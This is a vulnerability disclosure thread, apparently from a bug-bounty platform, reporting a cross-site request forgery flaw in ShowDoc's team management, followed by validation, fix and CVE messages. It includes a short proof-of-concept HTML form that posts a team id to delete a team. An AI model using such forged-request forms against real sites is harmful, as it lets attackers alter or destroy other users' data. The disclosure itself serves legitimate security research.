Cross-Site Request Forgery (CSRF) in star7th/showdoc


Reported on

Nov 21st 2021


You set the strict flag only for one of your cookies named cookie_token but in Team management attacker still can delete or add teams with CSRF vulnerability as the cookie with name PHPSESSID don't have strict flag.

Proof of Concept

1.replace 38046 with the team id poc.html and click on submit button.

3.after that the team with id 38046 or your replaced team id will be deleted.


  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="id" value="38046" />
      <input type="submit" value="Submit request" />
We are processing your report and will contact the star7th/showdoc team within 24 hours. 13 days ago
star7th validated this vulnerability 12 days ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
star7th confirmed that a fix has been merged on 654e87 12 days ago
star7th has been awarded the fix bounty
ItemModel.class.php#L1-L40 has been validated
12 days ago


I should fix it. You can test it

12 days ago


Hey chen

Not fixed and just like before( I logout from the system and login again)

this is a fix commit that have a good fix for strict cookies :

Jamie Slome
11 days ago


@amammad 👋 it looks like a bug on our side caused the disclosure bounty to be set to $155. We have reset it to the value displayed at disclosure ($64). Apologies for the confusion or inconvenience.

10 days ago


@amammad You can close the browser and open it again. Because the previous phpsessid was automatically maintained by the program, you need to restart the browser to invalidate it. If you log in again, the phpsessid is not regenerated.

Jamie Slome
3 days ago


CVE published! 🎊